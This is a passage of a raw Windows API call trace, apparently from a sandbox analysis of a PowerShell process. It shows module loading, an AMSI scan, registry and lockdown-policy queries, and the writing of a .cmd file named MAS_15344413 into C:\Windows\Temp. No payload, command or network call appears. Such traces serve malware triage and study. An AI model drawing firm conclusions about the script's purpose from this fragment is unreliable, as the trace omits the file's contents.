lpcbData=0xb156f8c680*=0x0) returned 0x2 [0171.365] RegCloseKey (hKey=0x9ec) returned 0x0 [0171.365] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c020, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0171.365] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c500) returned 1 [0171.365] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9ec [0171.366] GetFileType (hFile=0x9ec) returned 0x1 [0171.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c470) returned 1 [0171.366] GetFileType (hFile=0x9ec) returned 0x1 [0171.366] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144bfb0 [0171.366] GetSystemDirectoryW (in: lpBuffer=0x1e35144bfb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0171.366] CoTaskMemFree (pv=0x1e35144bfb0) [0171.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8c000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0171.366] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c450) returned 1 [0171.366] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xb156f8c530 | out: lpFileInformation=0xb156f8c530*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0171.366] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c410) returned 1 [0171.366] WldpGetLockdownPolicy () returned 0x0 [0171.366] GetSystemInfo (in: lpSystemInfo=0xb156f8c590 | out: lpSystemInfo=0xb156f8c590*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0171.367] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c498 | out: phkResult=0xb156f8c498*=0x9f0) returned 0x0 [0171.367] RegQueryValueExW (in: hKey=0x9f0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8c4e8, lpData=0x0, lpcbData=0xb156f8c4e0*=0x0 | out: lpType=0xb156f8c4e8*=0x0, lpData=0x0, lpcbData=0xb156f8c4e0*=0x0) returned 0x2 [0171.367] RegCloseKey (hKey=0x9f0) returned 0x0 [0171.367] CloseHandle (hObject=0x9ec) returned 1 [0171.367] CoCreateGuid (in: pguid=0xb156f8c648 | out: pguid=0xb156f8c648*(Data1=0xfb7b71ef, Data2=0x8065, Data3=0x4d3d, Data4=([0]=0x90, [1]=0x26, [2]=0x8b, [3]=0x48, [4]=0x9a, [5]=0x37, [6]=0x1, [7]=0x72))) returned 0x0 [0171.367] AmsiOpenSession () returned 0x0 [0171.367] AmsiScanString () returned 0x80070015 [0171.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b660) returned 1 [0171.371] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b740 | out: lpFileInformation=0xb156f8b740*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b620) returned 1 [0171.371] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0171.371] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0171.371] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144e810 [0171.371] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1e35144e810, nSize=0x105 | out: lpBuffer="") returned 0x97 [0171.372] CoTaskMemFree (pv=0x1e35144e810) [0171.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b420) returned 1 [0171.372] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b500 | out: lpFileInformation=0xb156f8b500*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b3e0) returned 1 [0171.379] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8afd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0171.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b420) returned 1 [0171.380] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b500 | out: lpFileInformation=0xb156f8b500*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0171.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b3e0) returned 1 [0171.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xb156f8afd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0171.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b420) returned 1 [0171.380] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b500 | out: lpFileInformation=0xb156f8b500*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0171.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b3e0) returned 1 [0171.380] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0xb156f8ae30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53 [0171.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b280) returned 1 [0171.380] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b360 | out: lpFileInformation=0xb156f8b360*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b240) returned 1 [0171.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8b280) returned 1 [0171.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0xb156f8b360 | out: lpFileInformation=0xb156f8b360*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0171.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8b240) returned 1 [0171.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xb156f8ad80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0171.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xb156f8ac80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0171.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xb156f8aa10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0171.848] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8cd28 | out: phkResult=0xb156f8cd28*=0x9ec) returned 0x0 [0171.848] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x0, lpcbData=0xb156f8cd70*=0x0 | out: lpType=0xb156f8cd78*=0x1, lpData=0x0, lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.848] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x1e339da93f0, lpcbData=0xb156f8cd70*=0x56 | out: lpType=0xb156f8cd78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.848] RegCloseKey (hKey=0x9ec) returned 0x0 [0171.848] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8cd28 | out: phkResult=0xb156f8cd28*=0x9ec) returned 0x0 [0171.848] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x0, lpcbData=0xb156f8cd70*=0x0 | out: lpType=0xb156f8cd78*=0x1, lpData=0x0, lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.848] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x1e339da9798, lpcbData=0xb156f8cd70*=0x56 | out: lpType=0xb156f8cd78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.848] RegCloseKey (hKey=0x9ec) returned 0x0 [0171.850] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8cd28 | out: phkResult=0xb156f8cd28*=0x9ec) returned 0x0 [0171.850] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x0, lpcbData=0xb156f8cd70*=0x0 | out: lpType=0xb156f8cd78*=0x1, lpData=0x0, lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.850] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x1e339da9b18, lpcbData=0xb156f8cd70*=0x56 | out: lpType=0xb156f8cd78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.850] RegCloseKey (hKey=0x9ec) returned 0x0 [0171.851] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8cd28 | out: phkResult=0xb156f8cd28*=0x9ec) returned 0x0 [0171.851] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x0, lpcbData=0xb156f8cd70*=0x0 | out: lpType=0xb156f8cd78*=0x1, lpData=0x0, lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.851] RegQueryValueExW (in: hKey=0x9ec, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cd78, lpData=0x1e339da9ec0, lpcbData=0xb156f8cd70*=0x56 | out: lpType=0xb156f8cd78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8cd70*=0x56) returned 0x0 [0171.851] RegCloseKey (hKey=0x9ec) returned 0x0 [0171.851] EtwEventActivityIdControl () returned 0x0 [0171.851] SetEvent (hEvent=0x9e4) returned 1 [0171.851] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xb156f8d130*=0x9e4, lpdwindex=0xb156f8cf04 | out: lpdwindex=0xb156f8cf04) returned 0x0 [0171.852] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144e3d0 [0171.969] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144e3d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0171.970] CoTaskMemFree (pv=0x1e35144e3d0) [0171.970] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d418 | out: lpConsoleScreenBufferInfo=0xb156f8d418) returned 1 [0172.209] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d418 | out: lpConsoleScreenBufferInfo=0xb156f8d418) returned 1 [0172.369] EtwEventActivityIdControl () returned 0x0 [0172.369] EtwEventActivityIdControl () returned 0x0 [0172.369] EtwEventActivityIdControl () returned 0x0 [0172.478] GetFileAttributesW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd")) returned 0xffffffff [0172.706] GetFileAttributesW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd")) returned 0xffffffff [0172.723] GetFileAttributesW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd")) returned 0xffffffff [0172.743] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144c3f0 [0172.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1e35144c3f0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0172.743] CoTaskMemFree (pv=0x1e35144c3f0) [0172.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x105, lpBuffer=0xb156f8cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x0) returned 0x20 [0172.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d340) returned 1 [0172.744] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d420 | out: lpFileInformation=0xb156f8d420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0172.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d300) returned 1 [0172.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd", nBufferLength=0x105, lpBuffer=0xb156f8cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Temp\\MAS_15344413.cmd", lpFilePart=0x0) returned 0x20 [0172.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d2d0) returned 1 [0172.744] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9ec [0172.750] GetFileType (hFile=0x9ec) returned 0x1 [0172.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d240) returned 1 [0172.750] GetFileType (hFile=0x9ec) returned 0x1 [0172.756] GetFileSize (in: hFile=0x9ec, lpFileSizeHigh=0xb156f8d428 | out: lpFileSizeHigh=0xb156f8d428*=0x0) returned 0x0 [0172.757] ReadFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d328, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesRead=0xb156f8d328*=0x0, lpOverlapped=0x0) returned 1 [0172.785] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.786] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.787] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.787] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.787] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.788] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.788] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.788] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.789] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.789] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.790] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.790] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.790] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.791] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.791] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.791] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.792] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.792] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.793] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.793] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.793] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.794] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.794] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 | out: lpBuffer=0x1e339e109e0*, lpNumberOfBytesWritten=0xb156f8d4d8*=0x1000, lpOverlapped=0x0) returned 1 [0172.794] WriteFile (in: hFile=0x9ec, lpBuffer=0x1e339e109e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0xb156f8d4d8, lpOverlapped=0x0 